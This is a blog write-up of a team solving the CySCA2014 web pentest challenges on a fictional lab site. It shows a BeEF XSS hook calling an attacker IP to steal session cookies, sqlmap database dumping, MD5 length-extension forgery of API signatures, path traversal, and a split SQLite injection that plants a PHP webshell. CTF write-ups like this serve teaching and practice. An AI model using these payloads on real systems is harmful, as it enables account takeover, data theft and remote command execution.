CySCA2014 is an Australian cybersecurity challenge that occurred over 24 hours on May 7th, 2014. Afterwards, the challenges were made available for download for anyone interested in attempting them. The link to download CySCA2014 is https://cyberchallenge.com.au/inabox.html. The challenges included web penetration testing, Android forensics, reverse engineering, cryptography, and more. Together with two friends I attempted to solve these challenges and what follows is a write-up of our process. We are only just getting started on CySCA2014 so as we solve more challenges, more blog posts will be added.
Web Application Pentest
Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.
CySCA2014 includes a website for a fictional company called Fortress Certifications. The website has several sections: ‘services’, ‘about’, ‘contact’, ‘blog’, and ‘sign in’. The ‘blog’ section of the website is grayed out and as the challenge description indicates, the user has to become ‘VIP’ to gain access to this section of the website.
Solving this challenge was fairly straightforward. After firing up Burpsuite and setting the web browser to use it as a proxy, it quickly became clear that the website sets a cookie on the client machine with a ‘vip’ parameter to determine whether a user is a VIP. Intercepting a request from the client to the server and changing the value from ‘vip=0’ to ‘vip=1’ granted access to the ‘blog’ section of the website and revealed the flag there.
For anyone new to Burpsuite, here’s something that will make your life a little easier. Under ‘Proxy’ -> ‘Options’ you can add a ‘match and replace’ rule to automatically change the cookie value from ‘vip=0’ to ‘vip=1’ on every request, so you don’t have to edit it manually each time. Even with intercept turned off, the request will still be modified; as long as the rule is marked ‘enabled’ you will remain VIP.
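The same idea can be sketched outside Burpsuite as a tiny helper that rewrites the raw Cookie header before each request. This is only an illustration of the match-and-replace concept; the cookie layout is an assumption based on what we saw in the proxy.

```python
def make_vip(cookie_header: str) -> str:
    """Flip vip=0 to vip=1 in a raw Cookie header string,
    mimicking the Burpsuite 'match and replace' rule."""
    return cookie_header.replace("vip=0", "vip=1")

# e.g. with a scripted client you would send
# headers={"Cookie": make_vip(original_cookie)}
```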
Om nom nom nom
Gain access to the Blog as a registered user to reveal the hidden flag.
Although we now have access to the blog, we are still identified as ‘guest’ as can be seen in one of the previous screenshots. This challenge requires us to become authenticated as a registered user. Our first instinct was to bruteforce our way in through the ‘sign in’ section of the site, using a list of usernames that was previously found under ‘contact’.
There are various ways in which a login form can be attacked, such as using the ‘intruder’ tool in Burpsuite or using a command line tool such as Hydra. Both of these tools and multiple wordlists were used in an attempt to find a valid combination of username and password, but after several hours of bruteforcing we had to acknowledge that becoming authenticated wouldn’t be as simple as that. In fact, had we taken the time to read the FAQ section of the challenge site we could have saved ourselves a significant amount of time, since it clearly states that bruteforcing passwords is never required.
Alright, so another method of becoming authenticated needs to be found. After browsing around the website and the blog for quite some time trying to find another way in, we noticed that a user was active on one of the blog posts. ‘Sycamore’ had last viewed one of his posts as recently as 37 seconds ago. Clearly there was an automated job set up on the Cysca box where this page was being refreshed regularly while being logged in as user Sycamore.
The first thing that came to mind was to use a cross site scripting (XSS) attack to steal Sycamore’s session ID. However, after leaving numerous comments with XSS code in various formats it became clear that comments were being filtered for this. So if we can’t inject XSS code into the site, how do we steal Sycamore’s session ID?
One thing that we have really enjoyed during almost all of the CySCA2014 challenges we’ve solved so far is that the solution can often be found in small details. In this case, we finally noticed a note underneath the comments section that said: “Links can be added with [Link title](http://example.com)”. So although we can’t insert XSS code into a comment directly, maybe we can add it to a link reference.
We fired up the ‘Beef-xss’ application and – after some playing around with different formats – submitted the following comment:
When viewing the blog entry, the comment only shows up as “pwnt”, but in the background the user’s browser is actually being redirected to 192.168.159.128:3000/hook.js, which ‘hooks’ it into beef-xss and allows us to manipulate it in all sorts of ways. In this case, all we really needed was to steal the session ID from the cookie and use it instead of our own session ID. After doing so, we were successfully authenticated as ‘Sycamore’ and the second flag was shown on the screen.
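The exact comment we submitted only appears in the screenshot, but the general idea of breaking out of a generated href attribute can be sketched as follows. The link template and payload below are illustrative assumptions, not the site’s actual markup:

```python
# Hypothetical: the blog turns [title](url) into <a href="url">title</a>.
# If the url is not sanitized, a crafted url can close the href attribute
# early and inject a script tag pointing at the BeEF hook.
LINK_TEMPLATE = '<a href="{url}">{title}</a>'

def render_link(title: str, url: str) -> str:
    return LINK_TEMPLATE.format(title=title, url=url)

payload_url = 'http://x/"><script src="http://192.168.159.128:3000/hook.js"></script>'
html = render_link("pwnt", payload_url)

# The rendered comment now contains a live script element
assert '<script src="http://192.168.159.128:3000/hook.js"></script>' in html
```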
Remember, like before you can add a ‘match and replace’ rule to Burpsuite to automatically replace your own session ID with Sycamore’s so that you don’t have to manually replace it every time.
Retrieve the hidden flag from the database.
This is where things really started to get challenging. The previous challenge gave us some trouble for a while, but the whole time we knew we were at least on the right track. With this one we had some moments where we were ready to give up. Fortunately, we stuck with it and after many hours of banging our heads against the wall we finally gained access to the database. Here’s how we did it.
Right away, seeing how the flag had to be retrieved from a database, we figured SQL injection would be the way to go. However, during the previous challenge we had moments where we couldn’t figure out how to authenticate as Sycamore, and in those moments we had already tested most of the parameters in our GET and POST requests for SQL injection – without success. Still, it didn’t take too long for us to find the parameter that could be injected. Now that we were authenticated as Sycamore we were able to delete comments, and the ‘comment_id’ parameter proved vulnerable to SQL injection. We discovered this by appending a single quote to the comment_id value and looking at the server response.
Once we found out that the parameter was vulnerable to SQL injection, we figured we were pretty much done. We couldn’t have been more wrong – this is where the challenge really started. There were several issues we had to overcome before we could go from vulnerability to exploitation.
First of all, the server responses to our SQL injection didn’t correspond to any write-ups of SQL attacks we could find. For instance, one of the first things that write-ups tell you to do is figure out how many columns are in the table you’re accessing. You can do this by adding a single quote to the parameter value followed by “order by 10;-- ”, which tells the SQL server to sort the results by column number 10. This will either result in a valid SQL statement, which you can recognize by the command going through (the comment will be deleted), or it will give an error message such as “unknown column ‘10’ in ‘order clause’”. The latter indicates that there are fewer than 10 columns in the table, so you narrow the number down until the command goes through. However, when we tried the ‘order by’ SQL injection, we received the following response from the server:
The server response indicated that it recognized everything we added after the parameter value as incorrect, including the single quote. In other words, we were not successful in ‘breaking out’ of the SQL statement that we were trying to inject into.
We must have spent hours trying to find the right SQL injection to return valuable server information, without any success. Everything we entered would just return the same error message to us (Later on we’ll see that we weren’t encoding our SQL injection commands correctly). At this point you might ask “why didn’t you just use an automated tool such as SQLmap?” Great question; this brings us to issue number two.
The website blog section uses CSRF tokens to prevent cross-site request forgery (CSRF). These tokens were also successful in stopping us from running automated SQL injection tools. The reason is that every request issued to the server has to include a valid CSRF token. Each server response then includes a new CSRF token, which has to be sent with the next request. A token is only valid once, and only for about 15-30 seconds. We’re not sure exactly how long it’s valid for, but if we waited too long before issuing a request to the server we would invariably get an “invalid CSRF token” error message.
We will spare you all the different ways in which we tried to circumvent this error message; we assume that since you are reading this walkthrough you already tried most if not all of those same tactics and discovered they did not work. The key to success for us was provided through BurpSuite’s ability to run a macro for each incoming request. So basically what we did was tell BurpSuite that every time a server request was intercepted, it had to run a macro that would retrieve the latest CSRF token and to replace the original token with the new one before sending the request on to the server.
Let’s look at that step by step. First, set up the macro that you will use. It needs to be a server request that obtains the new CSRF token, so a simple GET request for a blog page will do just fine. To configure the macro, go to ‘Options -> Sessions -> Macro’ and create a new macro.
When you ‘record’ the macro, just select a simple GET request for a blog page from your HTTP history. Now here’s the important part – you have to go to ‘configure item’ and select a custom parameter location from the server response. This is where we go to select the CSRF token and use it as a parameter in our next request. BurpSuite offers the awesome functionality of allowing you to just select what you wish to extract, and it will generate the appropriate syntax for you.
Now that the macro is set up, we need to create a session handling rule under ‘Options -> Sessions -> Session Handling Rules’. The rule has to specify to run our macro, under ‘rule actions’. You also have to set a scope for the rule, by clicking on the ‘scope’ tag. Here you will only select ‘proxy’ for when the rule will run, and for ‘URL scope’ you can either select ‘include all URLs’ or you can be more specific by selecting ‘use suite scope’. The latter requires you to go to ‘Target -> Scope’ and make sure you have the Cysca box’s URL defined as a target.
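The extract-and-replay idea behind the macro can also be scripted. Below is a minimal sketch assuming the token is exposed in a hidden form field named csrf_token; the actual field name on the challenge site may differ:

```python
import re

def extract_csrf(html):
    """Pull the CSRF token out of a hidden form field,
    mirroring what the Burpsuite macro extracts from each response."""
    m = re.search(r'name="csrf_token"\s+value="([^"]+)"', html)
    return m.group(1) if m else None
```

In a scripted attack, each response’s token would be fed into the very next request, which is exactly what the session handling rule automates.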
Now Burpsuite is configured to replace the CSRF token of incoming requests (sent using Burpsuite as a proxy) with a new and valid CSRF token. The next step is to configure SQLmap to perform SQL injection into the vulnerable parameter and to use Burpsuite as a proxy. The first thing we want to do is generate a ‘delete comment’ POST request that we can use as a template for SQLmap. Generate a ‘delete comment’ request or select one from your HTTP history (make sure it contains Sycamore’s PHPSESSID value in the cookie) and save it into a text file (we just used Leafpad for this). NOTE: Be careful – certain text file editors (vi) will include extra line feeds when you copy and paste a request from Burp into it. These extra line feeds WILL mess up your requests and provide you with invalid results. We spent several hours trying to troubleshoot our macro when all we had to do to get things to work was remove the extra lines from the template file. No fun!!
Alright, now it’s time to fire up SQLmap, tell it to use the text file with the POST request as a template (-r), inform it of which parameter to inject (-p), and point it to Burpsuite as a proxy (--proxy). The command for this is:
sqlmap -r <full path to request file> -p comment_id --proxy=http://127.0.0.1:8080
I would advise doing two things before running this command. (1) Enable intercept in Burpsuite so that you can see the request that SQLmap is sending out to the server, and (2) go to ‘Options -> Sessions -> Session Handling Rules’ and click ‘open sessions tracer’. The sessions tracer shows the original incoming request, the macro that is run, the action taken as a result of running the macro, and the final request that is sent out to the server. You can look at each of these steps and verify that your macro is running correctly and that it is in fact replacing the CSRF token from the template with a fresh one from the server for each request made. Notice that the SQL injection that is added to the ‘comment_id’ parameter is URL encoded. This is why we were previously unable to get information back from the server using manual SQL injection – we weren’t encoding our commands properly.
One more tip for this challenge: if you followed all of the steps described here and you are still having trouble performing SQL injection into the comment_id parameter, try running SQLmap with a delay on its requests (--delay 1 for a 1-second delay). We ran into a situation where our macro was running as intended, and looking at the individual requests in the session tracer showed that Burpsuite was inserting a fresh CSRF token into each request before sending it on, but we were still getting ‘invalid CSRF token’ errors in our responses. Again, we must have spent hours troubleshooting this issue when in the end, including a simple one-second delay in our SQLmap requests fixed it. We’ve also been able to successfully run attacks against the server without this delay, so it doesn’t seem to be strictly required, but it made things work for us when they wouldn’t work otherwise. We thought we’d include it in this walkthrough in case someone else experiences the same thing.
Now that we can successfully run a SQL injection attack against the server, getting the hidden flag is a piece of cake. First we enumerate all the databases on the server using the ‘--dbs’ flag. This reveals that there are two databases: ‘cysca’ and ‘information_schema’. For this challenge, only the ‘cysca’ database is of interest. Next we enumerate the tables in the cysca database by specifying the database with ‘-D cysca’ and using the ‘--tables’ flag. There are five tables in the ‘cysca’ database: ‘user’, ‘blogs’, ‘comments’, ‘flag’, and ‘rest_api_log’. Finally, we can dump the contents of the ‘flag’ table using the ‘-D cysca’, ‘-T flag’, and ‘--dump’ flags. This reveals that the hidden database flag is “CeramicDrunkSound667”.
Retrieve the hidden flag by gaining access to the caching control panel.
Our first question upon reading this challenge was “What the fuck is the caching control panel??” We had never heard of this before, despite at least one of us being somewhat familiar with web servers. Google did not help us out much, so we figured we’d just start on the challenge and hoped that it would become clearer as we made progress.
We started on this challenge by enumerating pretty much everything in the database that we had just compromised. The screenshots below show some of the information that was logged into the ‘log’ file for the server under /usr/share/sqlmap/output.
The ‘user’ table provided us with information on three registered users, including their password hashes and salts, while the ‘rest_api_log’ table contained GET, POST, and PUT requests that had previously been submitted to the server, including an API key for one user.
Our first attempt at making progress on this challenge was to try and crack the user passwords. Again, this was a waste of time, as bruteforcing is never required according to the Cysca FAQ. However, we reached this point before any of us had looked at the FAQ. Hopefully you did not make the same mistake. Needless to say, running hashcat with multiple wordlists and rules did not result in any cracked passwords.
Next we decided to see if we could attack the site’s rest API. On the website’s blog there is a post made by Sycamore that refers to the rest API specification, located at “<cysca>/api/documents/id/3”. Below is a screenshot of the document.
The document describes a couple of things: (1) that any request that modifies content (POST, PUT, and DELETE) needs to be signed with an API signature, (2) how a valid API signature is calculated, (3) what parameters need to be included in GET, POST, and PUT requests, and (4) what a valid and signed POST request looks like. At this point it was pretty clear that we needed to find a way to submit valid POST and/or PUT requests to the server. We didn’t know how it would help us locate the flag in the caching control panel, but we knew it would help us get there. So somehow we needed to find a way to create valid API signatures.
The problem is that the calculation of an API signature includes a shared secret. Without the shared secret, it is impossible to create a valid API signature – at least at first glance. Our first attempt at creating an API signature? Bruteforcing. Seriously – I will never again attempt a CTF challenge without reading the FAQ first.
Our thought process was as follows: We couldn’t crack the password hashes that we found in the database, but we assumed that a user’s password would be the same as their ‘shared secret’ for their API signatures. Since we had obtained a couple of valid API calls including signatures from the database, we might be able to uncover the secret by recreating the known API call and using a wordlist to insert the secret into it. The assumption here is that we were unable to previously crack the passwords due to them being salted, but now we might be successful because the salt doesn’t come into play for the API signature.
We created a script that took the string “contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf”, inserted an entry from a wordlist in front of it (as the secret), created an MD5 hash of the string, and then compared this MD5 hash to the one we knew to be valid for the API call. If the wordlist entry was equal to the secret, then the two MD5 hash values should be the same. Of course, even after using several different wordlists (and waiting for long periods of time for the script to finish) we did not find the secret. So now we were somewhat at a loss. If we don’t know the secret we can’t create valid API signatures, and if we can’t create these signatures then we can’t place valid API calls.
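Our script boiled down to something like the following sketch. The wordlist handling is trimmed, and the target hash below is only a placeholder for the signature we pulled from the ‘rest_api_log’ table:

```python
import hashlib

# The parameter string from the known-good API call (with '&' and '=' removed)
MESSAGE = "contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf"

def find_secret(candidates, message, target_hash):
    """Return the candidate for which md5(secret + message) matches
    the known-good signature, or None if no candidate matches."""
    for secret in candidates:
        digest = hashlib.md5((secret + message).encode()).hexdigest()
        if digest == target_hash:
            return secret
    return None
```

In practice `candidates` would be the lines of a wordlist; as described above, no wordlist we tried contained the secret.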
So we did what you should always do when you are at a loss for answers: we turned to Google. After a couple of different queries one of us stumbled on something called a ‘length extension attack’. A length extension attack is something that can be used to calculate a valid hash when you have the hash of (secret + message) and you know both the message and the length of the secret, even if you don’t know the secret itself. This sounded almost exactly like what we were faced with, although we didn’t know the length of our secret.
Length extension attacks work due to a vulnerability in numerous hashing algorithms, including MD5. The vulnerability has to do with how these algorithms calculate a hash value. For instance, MD5 processes input in blocks of a specific length (512 bits). The value of (secret + message) is padded with a ‘1’ bit and a number of ‘0’ bits, followed by the length of the string (secret + message) in bits, stored as a 64-bit little-endian value. So while the hexadecimal value of (secret + message) might be “73 65 63 72 65 74 64 61 74 61” (secretdata), the MD5 algorithm will add padding and a length indicator to it before hashing so that it looks like this:
“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00”
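The padding above can be reproduced in a few lines of Python. This is a sketch of MD5’s padding rule itself, not of any CySCA-specific code:

```python
import struct

def md5_pad(data: bytes) -> bytes:
    """Apply MD5's padding: a 0x80 byte (the '1' bit), zero bytes until the
    length is 56 mod 64, then the original bit length as a 64-bit
    little-endian integer."""
    bit_len = len(data) * 8
    padded = data + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    padded += struct.pack("<Q", bit_len)
    return padded

# "secretdata" is 10 bytes (80 bits), so the length field ends in 0x50
block = md5_pad(b"secretdata")
```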
So how can this be exploited? Well, the specifics get a little complicated here, so we’ll refer you to two excellent sources on the details of length extension attacks: https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks and https://blog.whitehatsec.com/hash-length-extension-attacks/.
Although we can’t say we completely understand the specifics of length extension attacks, we’ll try to put our understanding of what is explained in the two sources above into words, in the hopes we don’t fuck it up too much. Basically, you can append information to the string that is included in the calculation of the hash. For instance, instead of hashing “secretdata” we might want to calculate the hash of “secretdatamoredata”. The length extension attack will not work if you simply add stuff to the original message. However, it WILL work if you include the padding first and then add the additional information after it. Adding the hex value “6d 6f 72 65 64 61 74 61” (moredata) to the end gives us:
“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 6d 6f 72 65 64 61 74 61”

The MD5 hashing algorithm will first calculate the hash for the first 512 bits (which results in the hash that we already know) and use that value as the starting point for the calculation of the added data. Since we know the original hash, we can add information to the message without ever knowing the secret and still calculate a valid hash value! However, we do need to know the length of the secret, because otherwise we would not know how much padding to add to get to 512 bits. So let’s move on from the theory and look specifically at how we were able to implement the length extension attack.
As mentioned previously, we understood the gist of the length extension attack but we didn’t know enough about hashing algorithms or cryptography to execute this attack ourselves from scratch. Fortunately there are smarter people than us around who wrote tools to make such an attack a lot easier to do. Two such tools are ‘HashPump’ and ‘hash_extender’, both of which can be downloaded from Github. We ended up using HashPump so I will use that in my write-up of the challenge, but hash_extender offers the same functionality and both are very easy to use.
To use HashPump it requires the following arguments: (1) original message, (2) original hash, (3) message / data to add, and (4) length of the original secret. We had three out of these four arguments – we did not know the length of the secret. To overcome this obstacle we wrote a script with a loop that included the three variables we did know and incremented the value for ‘length of the original secret’ by one on each loop. At the end of each loop it would submit a POST request to the server, formatted according to the description in the rest-api-v2.txt document and it would display the resulting server response. Please note that we didn’t get all the syntax and formatting correct in this script right away. Like everything else during Cysca2014 it took us several hours to write a script that did exactly what we wanted. For instance, figuring out that the padding provided by HashPump needed to be converted from ‘\x00’ to ‘%00’ before the server would accept the request took a very long time by itself. But eventually we were rewarded for our efforts with a server response that said “error: file path does not exist”. We now knew that the length of ‘secret’ was 16 characters.
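The conversion that cost us so much time, turning the raw ‘\x00’ padding bytes in HashPump’s output into percent-encoded form the server would accept, is simple once you know it’s needed. A sketch (how you obtain the raw append string depends on the tool you use):

```python
def percent_encode(raw: bytes) -> str:
    """Percent-encode the non-printable padding bytes in a forged message
    (e.g. \\x80 and \\x00 become %80 and %00) while leaving ordinary
    characters alone."""
    out = []
    for b in raw:
        ch = chr(b)
        if ch.isalnum() or ch in "./_-":
            out.append(ch)
        else:
            out.append("%{:02x}".format(b))
    return "".join(out)
```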
So now we have all the information we need to create valid API signatures, right? Yes and no. Yes, we can create a valid signature for certain types of modified requests, but what can we do now? We can’t modify the original request (at least, at this point we didn’t think we could) because the length extension attack depends on the original message and hash to calculate a new one for the appended data. So all we can do is add something to the end. We tried moving back directories (adding ‘/../../../../var/www/index.php’) and even pointing to files that we knew existed (adding ‘/../rest-api-v2.txt’) but no matter what we added, we always received the “error: file path does not exist” message. Clearly we were still missing something.
After more experimentation and Googling, we finally came across some helpful information. Ironically, this information was found on the Github page (https://github.com/bwall/HashPump) for the tool that we had been using all along – HashPump – driving home once again the importance of attention to detail and carefully going through documentation. Looking at their example of a length extension attack, the information that they append to the original request is actually a parameter that has already been assigned a value. The idea here is that the parameter is given the value that was assigned to it last, so by re-assigning a value to the parameter you can actually overwrite the original value without having to modify the original request. The screenshot below shows what that would look like in HashPump. We’re giving the ‘filepath’ parameter a new value. However, the server does not accept our new API signature as valid.
We’ve seen previously that our method of calculating new API signatures with a length extension attack is correct, so we must be doing something else wrong. As it turns out, we were doing two things wrong. First of all, we weren’t adding the new value for filepath to HashPump in the correct way. Remember, the REST API documentation specifies that all ‘&’ and ‘=’ symbols need to be removed from the parameter list when calculating the API signature. Although we were doing this in HashPump for the original message, we completely forgot to do it for the appended information. So the server would calculate the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdffilepath/../../../../var/www/index.php”.
Meanwhile HashPump was calculating the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf&filepath=/../../../../var/www/index.php”.
Clearly, these strings would lead to different API signatures. However, after correcting this mistake the server would still not accept our API signature. Apparently the server was processing the request differently than we were expecting. Maybe it was not simply overwriting the parameter with the last assigned value, or maybe it was overwriting it before calculating the API signature. In both of those cases, the resulting API signature would be different from the one we calculated using HashPump.
Again we returned to Google for ideas on what to do next, and this time we stumbled on one of the most famous examples of a length extension attack: The exploitation of Flickr’s REST API in 2009. A write-up of this attack can be found here: http://netifera.com/research/flickr_api_signature_forgery.pdf.
We noticed two things while reading this write-up: (1) the scenario provided in this Cysca challenge is identical to the vulnerability in Flickr’s REST API, down to the description of the API itself, and (2) we completely missed a vulnerability in how the API signature is calculated. What we failed to pick up on initially is that with the way an API signature is calculated, a signature for “filepath=./example.pdf” is equivalent to the signature for “f=ilepath./example.pdf”. The reason for this is that for the calculation of the signature, the ‘&’ and ‘=’ symbols are removed from the string, so for both examples the resulting string on which the signature is calculated would be “filepath./example.pdf”. This is the crucial factor in this challenge that allowed us to generate valid API signatures while modifying the original request.
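The flaw is easy to demonstrate: since ‘&’ and ‘=’ are stripped before hashing, differently structured parameter strings collapse to the same signed string. The signing scheme below follows the API document’s description; the 16-character secret is a placeholder:

```python
import hashlib

def api_signature(secret: str, params: str) -> str:
    """Sign a parameter string the way the REST API doc describes:
    strip '&' and '=', then md5 the secret plus what remains."""
    normalized = params.replace("&", "").replace("=", "")
    return hashlib.md5((secret + normalized).encode()).hexdigest()

secret = "0123456789abcdef"  # placeholder 16-character secret
sig_a = api_signature(secret, "filepath=./example.pdf")
sig_b = api_signature(secret, "f=ilepath./example.pdf")
assert sig_a == sig_b  # two very different requests, one valid signature
```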
We ended up using this information by assigning almost everything in the original message to a parameter named just ‘c’ – the first letter in the original message – that would be ignored by the server, since ‘c’ is not a parameter that makes sense to the server. We then used HashPump to append the original parameter names to the request and generate a valid signature. The following screenshots show what that looks like, from the command line as well as the request that was issued to the server.
Finally! We were able to modify the values for the parameters that get submitted to the server while still being able to use the original message to perform a length extension attack and generate a valid API signature!
Now, all we have to do is find the path to an existing file on the server. We know that the file ‘index.php’ exists, since it gets included in the URL to reach the Fortress Certifications front page. Apparently, it is not located at ‘/var/www/index.php’, which is where it commonly resides. Instead, it is located in the same directory as the ‘documents’ folder. This was found out after trying a couple of different requests with different file paths, until the message below was received.
This message indicates that the REST API created a new link to a document – ‘index.php’. The link is located at http://192.168.198.128/api/documents/id/14. Note that the IP address for the host has changed from before (it used to be 192.168.159.129) but this is because of changes in our virtual network settings and not because of the request to the REST API.
Navigating to this URL provides us with a download prompt, and opening the downloaded file provided us with more information about other files that might be worth looking at: ‘cache.php’, and ‘caching.php’.
We can repeat the same process as before to also create links to these files through the REST API. After doing so, and opening ‘cache.php’, we found the flag that marks the completion of this challenge: “OrganicPamperSenator877”.
Reveal the final flag, which is hidden in the /flag.txt file on the web server.
The ‘index.php’ and ‘cache.php’ files tell us how to get to the caching control panel. We need to generate an MD5 hash of “OrganicPamperSenator877” and append it to ‘http://<host>/cache.php?access=’. Doing so brings us to the page below.
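Computing the access token is a one-liner; the <host> placeholder stands in for the challenge VM’s address:

```python
import hashlib

# md5 of the previous flag becomes the access token for the panel
token = hashlib.md5(b"OrganicPamperSenator877").hexdigest()
url = "http://<host>/cache.php?access=" + token
```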
The caching control panel enables the caching of certain pages. We can enter a title and a URL for a page, and it will be stored as a cached page in the backend database. How this works exactly can be learned by investigating the source code for ‘cache.php’ and ‘caching.php’. These pages contain the functions and logic that work behind the scenes when a request is submitted through this page, and thoroughly investigating the source code can reveal any flaws or vulnerabilities in the caching process.
Through code investigation and some experimentation we were able to determine that the ‘Title’ field is vulnerable to code injection. After submitting a query, the function that inputs the data into the database is “setCache”, which takes the parameters ‘key’, ‘title’, ‘uri’, and ‘data’. Additionally it uses the database function ‘datetime()’ to insert the date and time of when the query was submitted into the database. This function can be seen below. The ‘title’ and ‘uri’ variables come from what we enter into the caching control panel. The ‘key’ variable is an MD5 hash of the server name plus the requested URI, and ‘data’ is the contents of the page that was entered into the ‘URI’ field.
It’s possible to break out of this function through the use of single quotation marks and entering self-chosen values for the variables that the function is expecting. The result of doing so can be seen below.
Even though we get a syntax error, generated by the remaining code behind our injection, the function executes just fine and our self-chosen values get entered into the database. Additionally, by using a SQLite function – random() – in our injection we determined that we can successfully execute other SQLite functions besides datetime(). We knew the backend database was SQLite because this was specified in the source code of ‘caching.php’.
This is where we got stuck on this challenge. It seems clear that we have to use code injection and database functions to get to the ‘/flag.txt’ file on the server, but there are two constraining factors that make this challenge extremely difficult: (1) there is a character limit of 40 characters on the ‘Title’ field in the caching control panel. This makes it almost impossible to inject anything useful, and (2) while there is no character limit on the ‘URI’ field, anything entered into this field gets parsed and validated by functions in ‘caching.php’, which makes it seemingly impossible to inject anything into this field.
We spent many hours experimenting with different types of injections and different strategies. We found a page online that explains how to exploit a SQLite database through the use of the ‘ATTACH DATABASE’ command: http://atta.cked.me/home/sqlite3injectioncheatsheet. However, it seemed like this strategy would not work for us due to the limit on how many characters we could enter. Eventually we decided that this challenge was beyond us and we decided to look at the walkthrough posted on the CySCA2014 website: https://cyberchallenge.com.au/CySCA2014_Web_Penetration_Testing.pdf.
Since we didn’t solve this challenge ourselves, I won’t present the solution as our own. Instead I recommend you follow the link above for a walkthrough of the problem. After reading the solution, we were glad we hadn’t spent even more time trying to solve it, because the walkthrough blew our minds; there was no way we could have figured this out for ourselves. We were on the right path, but the steps that had to be taken to get around the character limit were ridiculous. For the remainder of this write-up I will focus on explaining the steps in the CySCA solution, since I don’t think their walkthrough provides a lot of clarification on how to get to ‘/flag.txt’. Even after following their steps it took us some time and reasoning to figure out why they worked.
The walkthrough describes that the goal is to inject the following 122-character string into the database:
',0); ATTACH DATABASE 'a.php' AS a; CREATE TABLE a.b (c text); INSERT INTO a.b VALUES ('<? system($_GET[''cmd'']); ?>');/*
The way this is accomplished is by breaking the string up into smaller sections and piecing them back together at a later point. The four strings that are individually injected will be:
- ',0);ATTACH DATABASE 'a.php' AS a;/*
- */CREATE TABLE a.b (c text);INSERT /*
- */INTO a.b VALUES('<? system($'||/*
- */'_GET[''cmd'']); ?>');/*
Each string starts with the end to a block comment (*/) and ends with the start to a block comment (/*), except for the first string which doesn’t start with one. This ensures that any code that might make its way in between these strings is commented out – this is what allows these individual database entries to be pieced back together into a single injection string. After performing the code injection, the caching control page will look as below:
You’ll notice that the third entry looks incomplete. However, investigation of the source code of the page reveals that the injected code is all there, it’s just being interpreted differently by your browser.
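A small Python sketch shows why the interleaving works: once everything between each ‘/* ... */’ pair is stripped, which is effectively what SQLite’s parser does with block comments, the four fragments collapse back into the intended payload regardless of the legitimate page content sitting between them. The noise string below is a stand-in for whatever real HTML/SQL separates the cached entries:

```python
import re

fragments = [
    "',0);ATTACH DATABASE 'a.php' AS a;/*",
    "*/CREATE TABLE a.b (c text);INSERT /*",
    "*/INTO a.b VALUES('<? system($'||/*",
    "*/'_GET[''cmd'']); ?>');/*",
]

# Stand-in for the legitimate page content between our cached entries.
page_noise = " ...legitimate page content... "
combined = page_noise.join(fragments)

# Remove every /* ... */ pair, as the SQL parser effectively does.
effective = re.sub(r"/\*.*?\*/", "", combined, flags=re.DOTALL)
print(effective)  # the reassembled injection, ending in a dangling '/*'
```

The dangling ‘/*’ at the end is deliberate: it comments out whatever real SQL follows the injection point.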
So what is this supposed to do, once pieced back together? The ‘ATTACH DATABASE’ command attaches a database file to SQLite, and if the file doesn’t exist it is created. Effectively, then, this command creates a file called “a.php”. The rest of the commands create a table (a.b) in the newly attached database, with a single text column named ‘c’, and insert one row into it: the string “<? system($_GET['cmd']); ?>” (the doubled single quotes in the injection are SQLite’s escape for a literal quote, and the || operator concatenates the two halves of the string). This code ends up inside the database file ‘a.php’, and ‘a.php’ should then be accessible as a web page where it will attempt to execute a given system command. So effectively the injection code will provide us with a shell on the system through a web page.
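You can verify this behaviour with Python’s sqlite3 module: attaching a non-existent database creates the file, and the inserted PHP string is stored in it verbatim. The path below is a temporary stand-in for the web root:

```python
import os
import sqlite3
import tempfile

path = os.path.join(tempfile.mkdtemp(), "a.php")  # stand-in for the web root

con = sqlite3.connect(":memory:")
con.execute("ATTACH DATABASE '%s' AS a" % path)   # creates a.php on disk
con.execute("CREATE TABLE a.b (c text)")
# The doubled single quotes are SQLite's escape for a literal quote.
con.execute("INSERT INTO a.b VALUES ('<? system($_GET[''cmd'']); ?>')")
con.commit()
con.close()

raw = open(path, "rb").read()
print(raw.startswith(b"SQLite format 3"))         # it's still a database file...
print(b"<? system($_GET['cmd']); ?>" in raw)      # ...but the PHP payload is inside
```

This also explains the stray database bytes visible in the webshell output later: PHP happily interprets the `<? ... ?>` block and echoes the surrounding SQLite file contents as-is.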
The way in which these four lines of code are pieced back together is by caching the ‘cache.php’ page itself. It took us a while to reason out how caching the caching page would execute this code, but it works because of the first line of injection code. You’ll notice that it starts with “',0);”. Thinking back to the ‘setCache’ function in the ‘caching.php’ source code, you’ll remember that it took four parameters, the last of which was ‘$data’. The ‘data’ variable contains the source code of whatever page is being cached. By starting the first line of injection code with “',0);” we’re effectively breaking out of the ‘data’ value and executing the code that comes after: the code that attaches the database.
So by caching the ‘cache.php’ page, the setCache() function will look at the source code for the page that is being cached: ‘cache.php’. On the page it will encounter the first line of injection code, which breaks out of the ‘data’ variable. It then executes the rest of the code until it gets to the block comment marker (/*). It ignores whatever comes next until the end of the block comment marker is encountered, which is at the beginning of the next line of injection code. This continues until all four lines of injection code have been pieced together, and they then get executed, causing ‘a.php’ to be created with the code that allows us to execute commands on the system. The screenshots below show this process.
NOTE: I messed up my commands, resulting in a file ‘a.php’ which did not allow me to execute system commands. I entered everything again, but of course the database ‘a’ and table ‘a.b’ already existed, so in the rest of the screenshots you will see ‘z.php’ and database ‘z’ instead.
